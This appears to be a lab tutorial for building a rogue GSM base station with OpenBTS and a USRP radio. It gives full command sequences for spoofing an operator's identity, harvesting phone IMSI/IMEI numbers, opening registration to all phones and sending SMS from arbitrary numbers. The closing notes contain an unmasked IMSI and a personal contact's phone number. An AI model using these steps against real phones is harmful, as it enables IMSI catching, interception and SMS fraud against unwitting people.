We will use OpenBTS and a USRP B210 software defined radio to build a rogue GSM base station, allowing to send fake SMS, intercept SMS between users, and spoof the phone provider’s identity.
- Ettus USRP B200mini/B210
- GHz Antenna
- 5 GB free
- Some test phones for the experiments. We will catch the IMEI and IMSI of the test phones, and whitest them, so that no other user will accidentally connect to the test network.
OpenBTS official scripts assume to be installed on a Ubuntu 16.04 “Xenial” system. Hence, a virtual machine is the better way to use it. We use Vagrant to manage and provision the virtual machine.
First, install the needed tooling (VirtualBox and Vagrant) on the host computer:
make host-installReboot the machine that user group changes take effect.
Then, issue the following command that will install the guest operating system and the needed tolling on it:
vagrant upThis will create the virtual machine according to the Vagrantfile and provision
the guest operating system by calling the guest-install Makefile’s target. The
operation took between 30 minutes and 1 hour.
Make sure the USRP B210 is connected to your machine, then connect to the virtual machine.
vagrant sshFirst, check that radio is detected:
sudo uhd_find_devicesAnd that the radio is able to transmit:
cd ~/openbts-install/dev/openbts/debian/openbts/OpenBTS/
sudo ./transceiverNow, inside the guest, issue each of the following command in a separate
terminal (use tmux):
cd ~/openbts-demo && make guest-launch-sipauthcd ~/openbts-demo && make guest-launch-smqueuecd ~/openbts-demo && make guest-launch-asteriskcd ~/openbts-demo && make guest-launch-openbtsNow, you should see a red LED on for the TX/RX antenna and a green LED on for the RX2 antenna of the USRP.
cd ~/openbts-demo && make guest-launch-openbtscliNow, you can type commands in the OpenBTSCLI command line interface
(OpenBTS>). We assume that the following commands will be typed inside this
prompt.
A phone and a base station are meant to be far from each others. Hence, it is important to put the phone at 50 cm away from the BS minimum, and to adjust the receive gain, 2dB is a good value when the phone is close, to avoid clipping. Also set the transmission attenuation, e.g. 20dB:
rxgain 2 power 20
Setup a spoofed network identity. You can find MCC and MNC looking at file:html/CellIFDinder.com - MCC MNC List.html. We chose an Italian operator that is not available in France. With a French SIM, you have to select it manually. With an Italian WIND SIM, it will be chosen automatically. If you want to use an operator that exist in the area, then you have to overpower its signal, we chose not to.
config GSM.Identity.ShortName WIND config GSM.Identity.MCC 222 config GSM.Identity.MNC 88
Now, take a test phone and do a manual scan for the networks. You should see a new carrier appear. Try to connect to the network (disabling mobile data and switching plane mode could help), you will get a failure, but this is enough to catch the IMSI/IMEI information. Look at IMSI collected:
tmsis
IMSI TMSI IMEI AUTH CREATED ACCESSED TMSI_ASSIGNED 2*************7 - 3*************0 0 3s 3s 0
We can authorize this specific test phone, a mobile station (MS), to register by its IMSI:
config Control.LUR.OpenRegistration 2*************7
Or authorize all MS to register with the following regular expression:
config Control.LUR.OpenRegistration .*
Now your phone could connect. You can send an SMS to the phone, from any number you want.
sendsms 2*************7 0610102020 "Hey, you!"
At the end of the demonstration, reset the configuration:
rmconfig GSM.Identity.ShortName rmconfig GSM.Identity.MCC rmconfig GSM.Identity.MNC rmconfig Control.LUR.OpenRegistration
If you add two phones, they can send each other messages. Once you are done, close all the programs. Then, halt the virtual machine.
vagrant haltIMSI of OnePlus 3T: 208017706545823 Number of one contact of mine: 0698803022 Series of command for OpenBTSCLI: rxgain 2 power 20 config GSM.Identity.ShortName WIND config GSM.Identity.MCC 222 config GSM.Identity.MNC 88 tmsis config Control.LUR.OpenRegistration 208017706545823 OR config Control.LUR.OpenRegistration .* sendsms 208017706545823 0698803022 "Hey, you!" rmconfig GSM.Identity.ShortName rmconfig GSM.Identity.MCC rmconfig GSM.Identity.MNC rmconfig Control.LUR.OpenRegistration